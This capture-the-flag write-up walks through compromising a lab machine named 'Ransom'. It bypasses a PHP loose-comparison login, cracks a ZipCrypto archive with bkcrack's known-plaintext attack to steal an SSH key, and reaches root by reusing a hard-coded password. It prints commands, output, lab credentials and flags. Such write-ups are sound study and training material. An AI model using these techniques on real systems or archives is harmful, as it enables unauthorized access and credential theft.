Ransom
Recon
HTTP (80)
The login page sends the password as a GET query parameter, for whatever reason (so it lands in the URL and in every server and proxy log along the way).

The request is sent to /api/login with jQuery:
<script>
$(document).ready(function () {
$("#loginform").submit(function () {
$.ajax({
type: "GET",
url: "api/login",
data: {
password: $("#password").val(),
},
success: function (data) {
if (data === "Login Successful") {
window.location.replace("/");
} else {
document.getElementById("alert").style.visibility =
"visible";
document.getElementById("alert").innerHTML =
"Invalid Login";
}
},
});
return false;
});
});
</script>
└─$ curl http://10.129.227.93/login?password=x -X OPTIONS -is | grep -E '^(HTTP|Allow)'
HTTP/1.1 200 OK
Allow: GET,HEAD,POST
└─$ curl http://10.129.227.93/login?password=x -X POST -is | head -1
HTTP/1.1 419 unknown status
└─$ curl http://10.129.227.93/login?password=x -X GET -is | head -1
HTTP/1.1 200 OK
└─$ curl http://10.129.227.93/api/login?password=x -X OPTIONS -is | grep -E '^(HTTP|Allow)'
HTTP/1.1 200 OK
Allow: GET,HEAD
└─$ curl http://10.129.227.93/api/login?password=x -X GET -is | head -1
HTTP/1.1 200 OK
└─$ curl http://10.129.227.93/api/login?password=x -X POST -is | head -1
HTTP/1.0 405 Method Not Allowed
POST is rejected outright rather than crashing anything: /login answers 419 (Laravel's CSRF token mismatch status, "Page Expired", which fits the Laravel app found later) and /api/login answers 405 Method Not Allowed, so the API route is registered for GET/HEAD only.

Sending the request as a GET but with a request body, the body a POST would carry, still works and logs us in.

Set that cookie in the browser yourself, go to /,
and the dashboard will render.

User.txt
> http://10.129.227.93/user.txt
516715c9b3590a1f9da37c175f2971d2
SSH (22)
The zip requires a password:
└─$ unzip uploaded-file-3422\ \(1\).zip
Archive: uploaded-file-3422 (1).zip
[uploaded-file-3422 (1).zip] .bash_logout password:
└─$ 7z l uploaded-file-3422\ \(1\).zip
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------------------
2020-02-25 07:03:22 ..... 220 170 .bash_logout
2020-02-25 07:03:22 ..... 3771 1752 .bashrc
2020-02-25 07:03:22 ..... 807 404 .profile
2021-07-02 13:58:14 D.... 0 0 .cache
2021-07-02 13:58:14 ..... 0 12 .cache/motd.legal-displayed
2021-07-02 13:58:19 ..... 0 12 .sudo_as_admin_successful
2022-03-07 07:32:54 D.... 0 0 .ssh
2022-03-07 07:32:25 ..... 2610 1990 .ssh/id_rsa
2022-03-07 07:32:46 ..... 564 475 .ssh/authorized_keys
2022-03-07 07:32:54 ..... 564 475 .ssh/id_rsa.pub
2022-03-07 07:32:54 ..... 2009 581 .viminfo
------------------- ----- ------------ ------------ ------------------------
2022-03-07 07:32:54 10545 5871 9 files, 2 folders
└─$ zip2john uploaded-file-3422\ \(1\).zip -o .ssh/id_rsa > hash
---
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes
John could not crack the password, so it is most probably not in rockyou.
The encryption method is ZipCrypto, the legacy PKWARE stream cipher, which is known to be broken by a known-plaintext (crib) attack: a few bytes of plaintext for any one entry are enough to recover the three internal keys and decrypt every entry without the password.

https://xhacka.github.io/posts/writeup/2023/07/29/MCTEENX/
└─$ curl -LOs https://github.com/kimci86/bkcrack/releases/download/v1.7.0/bkcrack-1.7.0-Linux.tar.gz
└─$ tar -xvzf bkcrack-1.7.0-Linux.tar.gz
└─$ echo '-----BEGIN OPENSSH PRIVATE KEY-----' > known.txt
➜ .\bkcrack.exe -C .\uploaded.zip -c .ssh/id_rsa -p known.txt
bkcrack 1.7.0 - 2024-05-26
[18:10:59] Z reduction using 29 bytes of known plaintext
100.0 % (29 / 29)
[18:11:00] Attack on 266925 Z values at index 6
100.0 % (266925 / 266925)
[18:19:08] Could not find the keys.
The first attempt at retrieving id_rsa
failed. The listing above shows id_rsa stored deflated (2610 bytes down to 1990), so the bytes that were encrypted are the deflate stream, not the PEM text; the header line given as plaintext (plus the trailing newline echo adds) does not occur at the start of the ciphertext at all. For a compressed entry bkcrack needs the compressed form of the known plaintext.
My own .bash_logout
has the same size as the one in the zip (220 bytes), and it is a file nobody usually edits, so it is a good known-plaintext candidate. Zipping it with the same deflate settings and passing that archive to bkcrack with -P lets bkcrack use the compressed bytes as the plaintext (-p then names the entry inside that archive).
└─$ ls -l ~/.bash_logout
Permissions Size User Date Modified Name
.rw-r--r-- 220 woyag 26 Nov 2023 /home/woyag/.bash_logout
└─$ cp ~/.bash_logout .
└─$ zip bash_logout.zip .bash_logout
adding: .bash_logout (deflated 28%)
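Before spending minutes on the attack it is worth confirming the candidate really is the same file. The following is an added example for this writeup, not code from the page or from bkcrack: ZipCrypto encrypts only the entry data, so the central directory, with the CRC-32 of the uncompressed plaintext, the compression method and the compressed size, is readable without the password, and a candidate can be checked byte-for-byte by CRC. For deflated entries it also deflates the candidate with zipfile's own settings and compares the length with the encrypted stream (minus the 12-byte ZipCrypto header), a hint that the compressed bytes will line up too. The entry name and the sample file contents are assumptions; zipfile cannot write ZipCrypto, so the constructed fixture is an unencrypted archive that exposes the same headers.

```python
"""Pre-check a known-plaintext candidate for a ZipCrypto archive.

Added example; not from the original writeup or from bkcrack. Relies on:
ZipCrypto leaves the central directory in the clear (CRC-32 of the
uncompressed plaintext, compression method, compressed size), and the
compressed size of an encrypted entry includes the 12-byte ZipCrypto header.
"""
import io
import zipfile
import zlib

# Constructed sample input: the text of a stock Ubuntu ~/.bash_logout.
SAMPLE_BASH_LOGOUT = (
    b"# ~/.bash_logout: executed by bash(1) when login shell exits.\n"
    b"\n"
    b"# when leaving the console clear the screen to increase privacy\n"
    b"\n"
    b'if [ "$SHLVL" = 1 ]; then\n'
    b"    [ -x /usr/bin/clear_console ] && /usr/bin/clear_console -q\n"
    b"fi\n"
)

ZIPCRYPTO_HEADER_LEN = 12


def deflate_like_zipfile(data: bytes) -> bytes:
    """Raw deflate stream with the settings Python's zipfile uses for
    ZIP_DEFLATED (zlib default level, no zlib wrapper)."""
    comp = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15)
    return comp.compress(data) + comp.flush()


def precheck(archive: bytes, candidates: dict) -> dict:
    """Compare candidate plaintexts {entry name: bytes} against the archive's
    cleartext metadata. crc_match is decisive for the plaintext itself;
    compressed_len_match only says whether our deflate stream has the same
    length as the encrypted one (another zip tool may deflate the same bytes
    differently, so treat a length mismatch as a warning, not a veto)."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name, plain in candidates.items():
            info = zf.getinfo(name)
            encrypted = bool(info.flag_bits & 0x1)  # general-purpose bit 0
            deflated = info.compress_type == zipfile.ZIP_DEFLATED
            ours = deflate_like_zipfile(plain) if deflated else plain
            stored_len = info.compress_size - (ZIPCRYPTO_HEADER_LEN if encrypted else 0)
            report[name] = {
                "encrypted": encrypted,
                "deflated": deflated,
                "crc_match": (zlib.crc32(plain) & 0xFFFFFFFF) == info.CRC,
                "compressed_len_match": len(ours) == stored_len,
                "archive_compressed_len": stored_len,
                "candidate_compressed_len": len(ours),
            }
    return report


def build_sample_archive(files: dict) -> bytes:
    """Constructed fixture: a deflated archive built in memory. zipfile cannot
    write ZipCrypto, so it is unencrypted; the headers precheck() reads are
    the same ones a password-protected archive exposes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


if __name__ == "__main__":
    archive = build_sample_archive({".bash_logout": SAMPLE_BASH_LOGOUT})
    # A candidate that differs by a single byte fails the CRC check.
    for label, cand in (("identical", SAMPLE_BASH_LOGOUT),
                        ("one byte off", SAMPLE_BASH_LOGOUT + b"\n")):
        print(label, precheck(archive, {".bash_logout": cand})[".bash_logout"])
```

Against the real archive, call precheck with the bytes of uploaded.zip and {".bash_logout": <your local file>}: crc_match True means the plaintext is identical; compressed_len_match True with the 12-byte header subtracted (170 in the listing, 158 of actual deflate data) is the sign that the -P approach will line up.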
➜ .\bkcrack.exe -C .\uploaded.zip -c .bash_logout -P .\bash_logout.zip -p .bash_logout
bkcrack 1.7.0 - 2024-05-26
[18:41:19] Z reduction using 151 bytes of known plaintext
100.0 % (151 / 151)
[18:41:20] Attack on 54321 Z values at index 6
Keys: 7b549874 ebc25ec5 7e465e18
5.3 % (2861 / 54321)
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 2861
[18:41:24] Keys
7b549874 ebc25ec5 7e465e18
➜ .\bkcrack.exe -C .\uploaded.zip -k 7b549874 ebc25ec5 7e465e18 -D decrypted.zip
bkcrack 1.7.0 - 2024-05-26
[18:43:51] Writing decrypted archive decrypted.zip
100.0 % (9 / 9)
└─$ unzip decrypted.zip -d decrypted
└─$ cat decrypted/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----
└─$ cat decrypted/.ssh/id_rsa.pub
ssh-rsa ... htb@ransom
└─$ chmod 600 *.id_rsa
└─$ ssh -i htb.id_rsa htb@10.129.227.93
htb@ransom:~$ id
uid=1000(htb) gid=1000(htb) groups=1000(htb),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
Privilege Escalation
htb@ransom:/srv/prod$ grep password . -Rin | grep -vE 'js|css|vendor' 2>/dev/null
htb@ransom:/srv/prod$ grep 'password\b' . -Rin | grep -vE 'js|css|vendor|framework'
...
./app/Http/Controllers/AuthController.php:37: if ($request->get('password') == "UHC-March-Global-PW!") {
...
./.env:16:DB_PASSWORD=P@ssw0rd1!
...
./database/factories/UserFactory.php:21: 'password' => '$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi', // password

The AuthController line also explains the login bypass: == is PHP's loose comparison, and Laravel parses a JSON body into the request parameters regardless of the HTTP verb, so a GET to /api/login carrying a JSON body whose password is the boolean true satisfies true == "UHC-March-Global-PW!" without knowing the string (in PHP a non-empty string compares equal to true). A strict === or hash_equals() would reject it. The hard-coded web password and DB_PASSWORD from .env are the candidates to try for sudo and su.
htb@ransom:/srv/prod$ sudo -l
[sudo] password for htb: P@ssw0rd1!
Sorry, try again.
sudo: 1 incorrect password attempt
htb@ransom:/srv/prod$ sudo -l
[sudo] password for htb: UHC-March-Global-PW!
sudo: 1 incorrect password attempt
htb@ransom:/srv/prod$ su
Password: UHC-March-Global-PW!
root@ransom:/srv/prod# id
uid=0(root) gid=0(root) groups=0(root)
Creds (root reuses the web app's hard-coded login password):
root:UHC-March-Global-PW!
Root.txt
root@ransom:/srv/prod# cat /root/root.txt
35b7e0707ad4322eb1ca03ab49963b5e